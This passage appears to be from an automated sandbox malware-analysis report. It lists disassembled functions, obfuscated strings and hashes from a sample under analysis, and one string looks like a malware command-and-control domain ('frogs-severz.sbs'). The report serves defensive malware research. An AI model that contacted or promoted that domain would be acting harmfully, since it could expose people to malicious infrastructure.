                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                              • API String ID: 1279760036-1524723224
                              • Opcode ID: 259914c5e03d55f29d77d2d060d62d53067b6baefdfb77a18eb57d87218b6a6a
                              • Instruction ID: 92fb870ed9bcb55ca22653b5f908272234849d813ab1e397361452965098f517
                              • Opcode Fuzzy Hash: 259914c5e03d55f29d77d2d060d62d53067b6baefdfb77a18eb57d87218b6a6a
                              • Instruction Fuzzy Hash: A7228C7150C3808FD7619F28C4943AEBBE1ABD6314F188D2DE5D987392D7B98845CB93
                              Function 009894D0 Relevance: 17.9, Strings: 14, Instructions: 385COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                              • API String ID: 0-1787199350
                              • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                              • Instruction ID: cf7850fb8ca0e0715c3dd5fbc0d38b928cb471b5073afc60245c74b831bd66db
                              • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                              • Instruction Fuzzy Hash: FFB1C47010C3818FD3159F2984607ABBFE1AFD7744F1889ACE4D58B392D779890ACB92
                              Function 00B588BE Relevance: 12.9, Strings: 9, Instructions: 1611COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: vvS$*D@~$/M_g$6#o_$CG]$L,_N$Qy($qe_ $[W{
                              • API String ID: 0-460923326
                              • Opcode ID: a314e3bc7e645a280da05bc962fa50e4e7b8500092ebd0b16e7213501ea48975
                              • Instruction ID: f7edbbf6937ef1e89db192db639f2fadfb4e8a7090df6c60ba7d5f39838256c4
                              • Opcode Fuzzy Hash: a314e3bc7e645a280da05bc962fa50e4e7b8500092ebd0b16e7213501ea48975
                              • Instruction Fuzzy Hash: 80B239F3A082049FE3046E2DEC8567AFBE9EF94720F1A453DEAC4C7744EA3558058697
                              Function 009898F0 Relevance: 11.7, Strings: 9, Instructions: 428COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 7EDB854A739D0848D7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                              • API String ID: 0-2802868897
                              • Opcode ID: 11ca30389f6f2f9cbcc51bbb23b2c7ea6085312f031198b4da924a0d9a293f17
                              • Instruction ID: cf4f569e73d3b45af3d57966dbac514f4049b7c7e759dbdfb0604b8619e316df
                              • Opcode Fuzzy Hash: 11ca30389f6f2f9cbcc51bbb23b2c7ea6085312f031198b4da924a0d9a293f17
                              • Instruction Fuzzy Hash: 0EE16B72A483508BD328DF35C85176BBBE6EBD1314F198A2DE5E58B391D738C805CB92
                              Function 00B50406 Relevance: 9.1, Strings: 6, Instructions: 1622COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: q~$"~}$%st_$25!=$mjpO$qw
                              • API String ID: 0-4121076296
                              • Opcode ID: 1ac09ea7af49d5f7447af701f8835e5d812ef2bf9d7fc9f4b67852795045d46e
                              • Instruction ID: 1dc632978f3ddc789d45d751094204f642efbc6565ec2d1f06c32db3420f3d35
                              • Opcode Fuzzy Hash: 1ac09ea7af49d5f7447af701f8835e5d812ef2bf9d7fc9f4b67852795045d46e
                              • Instruction Fuzzy Hash: 20B238F3A0C2049FE3046E2DEC9577ABBE9EF94220F1A453DEAC5C3744EA7558048697
                              Function 0099DB30 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
                              • API String ID: 0-3274379026
                              • Opcode ID: e2faedac7c83efe778c73f34ef12a5059e277999b91585e0769ceb60bfce4835
                              • Instruction ID: 99c91b72d573e195fff2713ff767b21de67f5a61bd8a7757166da6e5d22b588a
                              • Opcode Fuzzy Hash: e2faedac7c83efe778c73f34ef12a5059e277999b91585e0769ceb60bfce4835
                              • Instruction Fuzzy Hash: 155156725193518BD720CF29C8906ABB7F6FFD2311F18895CE8C18B695EB748906C792
                              Function 00B51F3C Relevance: 6.6, Strings: 4, Instructions: 1637COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: N,w$Zx.$aN;$n??t
                              • API String ID: 0-2076266626
                              • Opcode ID: db2cf3a1d92eb6f93643c0fe9a11bbbf7d8657672af83bbf78ab4d8853aa4c41
                              • Instruction ID: 1b9844610ab63ea296748659ef8536b2db0c2d4905b8950bec082d5a02139d08
                              • Opcode Fuzzy Hash: db2cf3a1d92eb6f93643c0fe9a11bbbf7d8657672af83bbf78ab4d8853aa4c41
                              • Instruction Fuzzy Hash: 12B2F9F3A0C2109FE704AE2DEC8567AFBE9EF94720F16493DEAC4C3744E63558058696
                              Function 0098E35B Relevance: 6.5, Strings: 5, Instructions: 295COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: Lk$U\$Zb$frogs-severz.sbs$r
                              • API String ID: 0-2060998389
                              • Opcode ID: 7f42a1b4ac8ce2282749dc4b356f8b89f6a9fb928e6f7f4c0c82b519ec11a4e8
                              • Instruction ID: fed8e6b0be5ef01bdcf4efabd0359fb3cdf265f41d570f585f13de3241bf0464
                              • Opcode Fuzzy Hash: 7f42a1b4ac8ce2282749dc4b356f8b89f6a9fb928e6f7f4c0c82b519ec11a4e8
                              • Instruction Fuzzy Hash: AAA1BDB050C3D18AD7759F25C4A47EFBBE1AB93308F188A5CE0E94B292DB3945068B57
                              Function 00989210 Relevance: 6.5, Strings: 5, Instructions: 269COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: )=+4$57$7514$84*6$N
                              • API String ID: 0-4020838272
                              • Opcode ID: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                              • Instruction ID: d74990be4d0f5417834c313b2577637c89fa7b2ef15b1e2b9129e2389558207d
                              • Opcode Fuzzy Hash: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                              • Instruction Fuzzy Hash: 1E71BF6110C3D28BD315DB3984A077BBFE1AFA2305F1C49ADE4D64B392D779890AC752
                              Function 009A0870 Relevance: 5.9, Strings: 4, Instructions: 861COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: +2/?$=79$BBSH$GZE^
                              • API String ID: 0-3392023846
                              • Opcode ID: c6b0dfb18cc32e99646134bd02f91e05acf7b189f7f09c456925d0373dc2ddb7
                              • Instruction ID: c24666d9c3d824e3c6058d12bccfe2e5bb3db2cc0174c8b971c8b1cda0b94e87
                              • Opcode Fuzzy Hash: c6b0dfb18cc32e99646134bd02f91e05acf7b189f7f09c456925d0373dc2ddb7
                              • Instruction Fuzzy Hash: C152D071504B418FC735CF39C890766BBE2BF96314F188A6DD4E68BB92C735A806CB90
                              Function 0098B210 Relevance: 5.5, Strings: 4, Instructions: 464COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: H{D}$TgXy$_o]a$=>?
                              • API String ID: 0-2004217480
                              • Opcode ID: 890540aa20bebdfb513a7d207428087832b5475cfaaa8e27ff49d4a4ca0b5f1c
                              • Instruction ID: f40a0609560b078f46a762a2d560a71b3636d9477af00fbe9145c344512cb459
                              • Opcode Fuzzy Hash: 890540aa20bebdfb513a7d207428087832b5475cfaaa8e27ff49d4a4ca0b5f1c
                              • Instruction Fuzzy Hash: 841264B1614B01CFD3248F26D891B97BBF5FB45314F048A2DE4AA8BAA0DB74B445DF80
                              Function 009A7E20 Relevance: 5.5, Strings: 4, Instructions: 461COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: =:;8$=:;8$a{$kp
                              • API String ID: 0-2717198472
                              • Opcode ID: c3b9bc30a436973d07918f665fd6c67de7a6ac0d28fa8f34bba8e7b85f156a3a
                              • Instruction ID: e807832eb2e33150a7777ec08fad0b102f0c3e724cbe7eaa43393872ff4f7c38
                              • Opcode Fuzzy Hash: c3b9bc30a436973d07918f665fd6c67de7a6ac0d28fa8f34bba8e7b85f156a3a
                              • Instruction Fuzzy Hash: C8E1CCB595C341DFE320DF64D881B6BBBE5FBC5304F14892CE5858B2A1EB349805CB92
                              Function 0098AD00 Relevance: 5.4, Strings: 4, Instructions: 424COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @A$lPLN$svfZ$IK
                              • API String ID: 0-1806543684
                              • Opcode ID: 2bbd16e11a21fc2fe7e61c28b71e6d3c5f80720bc68c378fb3c920ef912d3448
                              • Instruction ID: a2f1d52840229b1bc4cf99e17469f322f3874c8e367c9860dc350c50ac06d9b9
                              • Opcode Fuzzy Hash: 2bbd16e11a21fc2fe7e61c28b71e6d3c5f80720bc68c378fb3c920ef912d3448
                              • Instruction Fuzzy Hash: 3BC1277264C3848FD3249E6484A536FBBE2EBC2710F1CC92DE4E54B395D7798C099B92
                              Function 00984040 Relevance: 4.2, Strings: 3, Instructions: 428COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: )$)$IEND
